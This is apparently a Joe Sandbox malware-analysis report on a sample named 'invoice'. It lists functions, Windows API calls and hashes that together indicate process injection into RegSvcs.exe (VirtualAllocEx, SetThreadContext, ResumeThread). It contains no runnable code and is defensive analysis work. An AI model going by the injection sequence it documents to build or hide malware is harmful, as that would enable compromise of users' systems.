Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 3682c767a390d5bdc5c65ec8abdfe65a990cc98354f9392396720e6914186978
Instruction ID: 0512fd6120631b8e7d86b0099e3fafc11c240c7f5d2989e5dbe3f0073301d41e
Opcode Fuzzy Hash: 3682c767a390d5bdc5c65ec8abdfe65a990cc98354f9392396720e6914186978
Instruction Fuzzy Hash: CA2114B19003499FCB10CF9AC985BEEBBF4FB48314F00842AE918A3350D778A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 025619D0 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02561A4F

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2de8564b053781e1cdcedd372b62172b95e6b47b0ef67a28433bbca04c8cd73e
Instruction ID: a1db7ec2d53d206399fb0ed46e7fa36873ffecd53576afb056cf46c364900b0a
Opcode Fuzzy Hash: 2de8564b053781e1cdcedd372b62172b95e6b47b0ef67a28433bbca04c8cd73e
Instruction Fuzzy Hash: B721E4B59003599FCB10CF9AD984BEEBBF4FB48324F108429E958A3350D375A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02561910 Relevance: 1.6, APIs: 1, Instructions: 58
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 02561987

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 6983adc038416907c56336686087baa422aff6c56e6c481ba04e037e328b00e7
Instruction ID: 0e6cfd6f0af854b1f1d869197978870fa647c7f9e565abd31b7421ee692ec51d
Opcode Fuzzy Hash: 6983adc038416907c56336686087baa422aff6c56e6c481ba04e037e328b00e7
Instruction Fuzzy Hash: 092136B1D006199FDB10CF9AC585BEEFBF8BB48224F04812AD418B3340D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06E4A3EC Relevance: 1.6, APIs: 1, Instructions: 56
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06E4B8F2,?,?,?,?,?), ref: 06E4B997

Memory Dump Source

Source File: 00000000.00000002.292408926.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_invoice.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: ff25027fd55b9a7e636bad6cf329f40947398389f06a283712752c4433fe78d0
Instruction ID: 7ae148c40895d234c52c98b35fb0fbc66f48aff9c92e9c318561c6ddb5ed2bcf
Opcode Fuzzy Hash: ff25027fd55b9a7e636bad6cf329f40947398389f06a283712752c4433fe78d0
Instruction Fuzzy Hash: ED1167B18003499FDB10CFAAD944BEEBFF8EF58324F14841AEA54A3210C375A950DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04BC8F28 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04BC9E49,00000800,00000000,00000000), ref: 04BCA05A

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c3a74538979c279f927db7dc83027577acf0ff85b2d887dd72a14a2a19a3574a
Instruction ID: a540a53b84a04a4852141db60dc063126a2899082ef071a4e355bd8738bebf9c
Opcode Fuzzy Hash: c3a74538979c279f927db7dc83027577acf0ff85b2d887dd72a14a2a19a3574a
Instruction Fuzzy Hash: 9C1114B69002098FDB10CFAAD484BDEFBF4EB88354F04856ED915A7200C775A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04BC9FEB Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04BC9E49,00000800,00000000,00000000), ref: 04BCA05A

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e0b453dfca01909b290be227313581d1526e91b4749d25d6441a9fcb1f9c89b7
Instruction ID: a866141ae9431e860e9345f569473b6ac6461c514b3f16fea8ba39b288e4026e
Opcode Fuzzy Hash: e0b453dfca01909b290be227313581d1526e91b4749d25d6441a9fcb1f9c89b7
Instruction Fuzzy Hash: B41126B6C002098FDB10CFAAD484BDEFBF4EB88364F04856ED459A7200C375A546CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02561AA0 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02561B0B

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 90888918a6873d3ffb376da4beeb2ce579c9479a2ef7ff72aa6c86dfdd500721
Instruction ID: 58eccadb344e6f5405a762dda712af77b130fe7e4bd1d7b207251c6d6b4dadae
Opcode Fuzzy Hash: 90888918a6873d3ffb376da4beeb2ce579c9479a2ef7ff72aa6c86dfdd500721
Instruction Fuzzy Hash: A71125B59002499FCB20CF9AD988BEEBFF4FB48324F148419E528A7310D375A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04BC9D68 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04BC9DCE

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 367c4b61a94c36c89c5290380461f512a3e3ad0caf7fc6d0b8cceea185f359d0
Instruction ID: 2499043d5e5303fa3d06b206468868a5e73faaf8f0a2e5389b3eda1b9bd55727
Opcode Fuzzy Hash: 367c4b61a94c36c89c5290380461f512a3e3ad0caf7fc6d0b8cceea185f359d0
Instruction Fuzzy Hash: 9711DFB6C002498FDB10CF9AD584BDEFBF5EB88324F14856AD859B7600C378A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D10640 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 04D1069D

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f2a2903916e168debd60c9221e5707e38613c24450240e1c39c12ffd29b4f50e
Instruction ID: 577222d4305757eaa8870e8569569ed6b78100df080709f139edb3111c558e7b
Opcode Fuzzy Hash: f2a2903916e168debd60c9221e5707e38613c24450240e1c39c12ffd29b4f50e
Instruction Fuzzy Hash: D91112B59003089FDB10DF9AD588BDEBBF8EB88324F10851AD854B3700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D1063F Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 04D1069D

Memory Dump Source

Source File: 00000000.00000002.287085140.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d10000_invoice.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 30d442aa3363c02ec95bec3a6b1f804fc58bc9ab01ee20babace24581c68e9e4
Instruction ID: f9c7c658df9341edfd9344d5de561a4925b8bfdf4f3fef0369eb770edd361471
Opcode Fuzzy Hash: 30d442aa3363c02ec95bec3a6b1f804fc58bc9ab01ee20babace24581c68e9e4
Instruction Fuzzy Hash: 451112B59002089FDB10DF9AD588BDEBFF8EB88324F10851AD858B7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02562670 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 025626CD

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ef8de67026da8946adea1e4357fb8e76a98c30b0f7601594b6275a447cfdc26f
Instruction ID: 0f70f8bdb3e522647e99dd89dd2bdc11edd5852bd563b6f3a4ddbb3db87ed857
Opcode Fuzzy Hash: ef8de67026da8946adea1e4357fb8e76a98c30b0f7601594b6275a447cfdc26f
Instruction Fuzzy Hash: 521103B58003489FDB10CF9AD988BDEBFF8FB48324F10845AD854A3200C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02561D00 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 02561D5F

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a4e6f3472229d98ddd3344a667dc091aa0d06e446fb0a1802442954ab6159835
Instruction ID: 42db0a56f773e44fd139b97b8fa6b13359255118e0598103195ec4e109e2c3d8
Opcode Fuzzy Hash: a4e6f3472229d98ddd3344a667dc091aa0d06e446fb0a1802442954ab6159835
Instruction Fuzzy Hash: 5E1112B18006488FCB20CF9AD588BEEBFF8FB88324F10845AD558A3300C775A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276677198.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cbd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f58bd4e4518e387c58811f711b625f17186cc22a7408e6c8fe80f777197601b
Instruction ID: d69dbba1e09b93bedf922c992199714bd9d003727f5ff1830890817f7cfb7b67
Opcode Fuzzy Hash: 7f58bd4e4518e387c58811f711b625f17186cc22a7408e6c8fe80f777197601b
Instruction Fuzzy Hash: 0B216AB1504204DFDF15CF50D8C0B67BF65FB94328F248569E9070B206D336E84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276677198.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cbd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c283dd3c1b47fea9c83e1a1e8c8aab57149fec960872deea9fc824b11daa57f
Instruction ID: 949d47329ab9bc7b142670b19d7134ce49ec64190c3c1525d47661349817eb6d
Opcode Fuzzy Hash: 2c283dd3c1b47fea9c83e1a1e8c8aab57149fec960872deea9fc824b11daa57f
Instruction Fuzzy Hash: C22107B1504244DFDB05DF10D8C0BA7BB65FB94324F24C5A9E9064B246D33AE856CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276716892.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ccd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4c95dc97e50f83665eb32ddb60b539190375900e68c568ceb04ec92b3d7b39
Instruction ID: 098326de043d86def5885a9304458997f8e21c403dc7881374abc82f0a63702c
Opcode Fuzzy Hash: ce4c95dc97e50f83665eb32ddb60b539190375900e68c568ceb04ec92b3d7b39
Instruction Fuzzy Hash: 2421F575504244DFDB14CF28D5C4F16BB65FB84314F24C5BDD94A4B246C73AD847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276716892.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ccd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8312237310047167b86c0e40dd2fde552cc9817e6c6cd269638a28b65625246
Instruction ID: 3b00f48e8aba24d741f944c41110dfa2e0e5e970e8b1a4bf946de2f5b0f994e3
Opcode Fuzzy Hash: a8312237310047167b86c0e40dd2fde552cc9817e6c6cd269638a28b65625246
Instruction Fuzzy Hash: 182104B1504204EFDB05DF20D9C0F26BBA5FB84324F24C6BDE94A4B246C73AEC46CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276716892.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ccd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc85cd615eb5cab41b799f7a710569f2b802943b938709185b0bf378381ef8b8
Instruction ID: d245f07d77c24924d733ebbf45b94aff6430155a1b644f02143bf7c8a295f773
Opcode Fuzzy Hash: fc85cd615eb5cab41b799f7a710569f2b802943b938709185b0bf378381ef8b8
Instruction Fuzzy Hash: B22180755093C08FCB02CF24D994B15BF71EB46314F28C5EED8898B697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276677198.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cbd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction ID: f3794017cd3a0e4a9e4c074239b288d88b2e90b0cf6d17c41f2c5183933da351
Opcode Fuzzy Hash: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction Fuzzy Hash: 1A11E6B6904280CFCF12CF14D5C4B56BF71FB94324F28C6A9D8460B616C33AD95ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276677198.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cbd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction ID: 21d8027a2eb4c807830654ba17e592334a359841a94193357b335cea677c3083
Opcode Fuzzy Hash: 8d778767f53fd0a6c663cb8d613203c36db215e48ccc3c7032546bce1bc62798
Instruction Fuzzy Hash: 2011D376404280CFCB11CF10D5C4B56BF71FB94324F28C6A9D8450B616C33AE95ACFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276716892.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ccd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a7eb2830fe3889e456d27655020f58fd7942a7660a67a9db2bbc7502f19bed
Instruction ID: 10a2fa982a3718c13023e4595ef5d25df4f26f62b00eb5c66eed97a2f87beefe
Opcode Fuzzy Hash: 06a7eb2830fe3889e456d27655020f58fd7942a7660a67a9db2bbc7502f19bed
Instruction Fuzzy Hash: 88119D76904280DFCB11CF10D9C4B15FBB1FB84324F28C6AED84A4B656C33AD94ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276677198.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cbd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcde733a35688daa8b9ce09d93bade4d537b33f4887f1461522e74656469f3b2
Instruction ID: 285a40d1af50016ecbda9982ab90eacc8d69315883452fa672cc5257793df592
Opcode Fuzzy Hash: bcde733a35688daa8b9ce09d93bade4d537b33f4887f1461522e74656469f3b2
Instruction Fuzzy Hash: B9012B71008354AAEB104F23DC84BE6FBD8EF41368F18C059ED1A6B24ADB799844C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276677198.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cbd000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c52843f9710dc3b66510704c4084d6db8e4bbe6b627a402f364e8ada7733910
Instruction ID: 29ca93a19c53863a0906d9b268ec1782528b399bb458e4cfe955e00a1a4d0c39
Opcode Fuzzy Hash: 5c52843f9710dc3b66510704c4084d6db8e4bbe6b627a402f364e8ada7733910
Instruction Fuzzy Hash: 6AF0C271408354AEEB108E06DC84BA2FBE8EB81734F18C15AED585B68AC3789C44CAB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02563778 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1748d2ec4c9317521af32623913030e205e87a5064ac3d63f6d1e1a58e249732
Instruction ID: af63fb0833dd31b93eb5e919c5e28cc9fe73d83bf8aae284607059ce341d8668
Opcode Fuzzy Hash: 1748d2ec4c9317521af32623913030e205e87a5064ac3d63f6d1e1a58e249732
Instruction Fuzzy Hash: EDD1AB717007019FEB29EB75C4647AABBF6AF89B04F1444ADD1468B2A0CF35E901CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04BCEC20 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02367a31e27171f0073bdac04eb5d2cca8444e14a2f9937e98b81e60051a78bb
Instruction ID: 115b5c86c3ed2ff5d6f578e57047180970e0227439b348ca216aa99306a16bca
Opcode Fuzzy Hash: 02367a31e27171f0073bdac04eb5d2cca8444e14a2f9937e98b81e60051a78bb
Instruction Fuzzy Hash: 5812D8F1C937668BE330CF65E4981893B61B74132ABD14A08D2619FAD0E7B4016EEF4C

Uniqueness

Uniqueness Score: -1.00%

Function 04BCC38C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44621e383bb2a5eb220f14d25ce8b2f42ba541eca2df88655fbaf65dd8dc4045
Instruction ID: ee8e340dcdfcd633e825f66f23f6b4270c54cee6a8da9ae4a43c0033a8daa3e0
Opcode Fuzzy Hash: 44621e383bb2a5eb220f14d25ce8b2f42ba541eca2df88655fbaf65dd8dc4045
Instruction Fuzzy Hash: 65A17936E10219CFCF15DFA5C88459EBBB6FF88304B1585BAE905BB220EB31E955CB40

Uniqueness

Uniqueness Score: -1.00%

Function 04BCEC11 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.286368591.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bc0000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61daa4829f6d83501d0c6c10cbe987fee10bcc66cacb59ce187a076f35f39f0
Instruction ID: 5def6318f5e4c6c54a736d6955038ae35281b2f0a7c4e5f703954fa989c2bc27
Opcode Fuzzy Hash: a61daa4829f6d83501d0c6c10cbe987fee10bcc66cacb59ce187a076f35f39f0
Instruction Fuzzy Hash: 6FC12CB1C937568BE720CF65E8881893B71BB4532AFD14A09D161AF6D0F7B4106EEF48

Uniqueness

Uniqueness Score: -1.00%

Function 02560040 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387f9b22b48f82d8483dfe7858ec22d7ad19520a2bdaf309972a7cbfe423995e
Instruction ID: 4c919bce6a579f8bd29629797e104cb5c93c0bc8c9fbd6586cbd29e5e7050d08
Opcode Fuzzy Hash: 387f9b22b48f82d8483dfe7858ec22d7ad19520a2bdaf309972a7cbfe423995e
Instruction Fuzzy Hash: AF513C71E1462A8BDB24CF6AD8447E9BBB2FFC9300F10C6A6D50DA7654EB305AD18F44

Uniqueness

Uniqueness Score: -1.00%

Function 02565270 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.276994402.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2560000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0a3ed3f31dbe3198d5d0f39932970fb097f3b3daf2dd50c1561257b02626a8
Instruction ID: b23304a1c8f781ed2f61227ae1bdca6ade8f4c4c6d8c72dd4a3a5599bc165428
Opcode Fuzzy Hash: 5e0a3ed3f31dbe3198d5d0f39932970fb097f3b3daf2dd50c1561257b02626a8
Instruction Fuzzy Hash: 61112730D452588BDB148FA9D458BFEBFF1BB4E304F58946AD441B3290E7789944CF68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 5440, Parent PID: 1784COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	4.4%
Total number of Nodes:	658
Total number of Limit Nodes:	81

Executed Functions

Function 004012A3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 187
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C

Strings

lA~r, xrefs: 0040149A

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: lA~r
API String ID: 2706961497-777729080
Opcode ID: fdf48541143ff3e6b35ed54b1a0158c26b1aa305b8eb49c65f8f5dfa0d7a34a0
Instruction ID: 8cecb21307847332dd27a2b6af04103a46c97ef68acc17b2cb050e2e6178c606
Opcode Fuzzy Hash: fdf48541143ff3e6b35ed54b1a0158c26b1aa305b8eb49c65f8f5dfa0d7a34a0
Instruction Fuzzy Hash: 78811571C1075CDADB20CFE5CC81AEEBBB4FF59300F20422AE515BB291E7B516858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041E177 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E1B0

Strings

HD@, xrefs: 0041E193, 0041E19F

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HD@
API String ID: 2167126740-1661062907
Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction ID: b2666c009228fcfd9c45b5aa99193e301eabfc5dad5b4991d9d1562ce351daa7
Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
Instruction Fuzzy Hash: 3AF015B6200208ABCB18DF89DC85EEB77ADAF88754F018109FE0897241C630F810CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1F2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E1B0

Strings

HD@, xrefs: 0041E193, 0041E19F

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: HD@
API String ID: 2167126740-1661062907
Opcode ID: 6de8aef1090c99001c021b0920a9d76a90c18374a749c80e9adae22f7b7e9026
Instruction ID: 8094d0c857aa87b0c2171788a03b1ae1ade2fa62a6ba48c908b3d04e10d69459
Opcode Fuzzy Hash: 6de8aef1090c99001c021b0920a9d76a90c18374a749c80e9adae22f7b7e9026
Instruction Fuzzy Hash: F5E0ECB6304549AFCB04DF59DC90CEB77A9EF8C218B15814AFD4883246C235E965CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF91 Relevance: 1.6, APIs: 1, Instructions: 87
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000005,00000000,004188C3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004188C3,00000000,00000005,00000060,00000000,00000000), ref: 0041DFE4

Memory Dump Source

Source File: 00000001.00000002.376302606.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7eba643ae448d0b17df8ef12d010edb2ff460905476d139efc05a70cf7a79fc1
Instruction ID: 237f2754c300ff0a578239398ca4bf442acebae7b84e63d0a2a94030e9c1651a
Opcode Fuzzy Hash: 7eba643ae448d0b17df8ef12d010edb2ff460905476d139efc05a70cf7a79fc1
Instruction Fuzzy Hash: A02107B6200208AFCB18DF99DC85EDB77A9EF8C714F058259FA4D97341C630E951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48
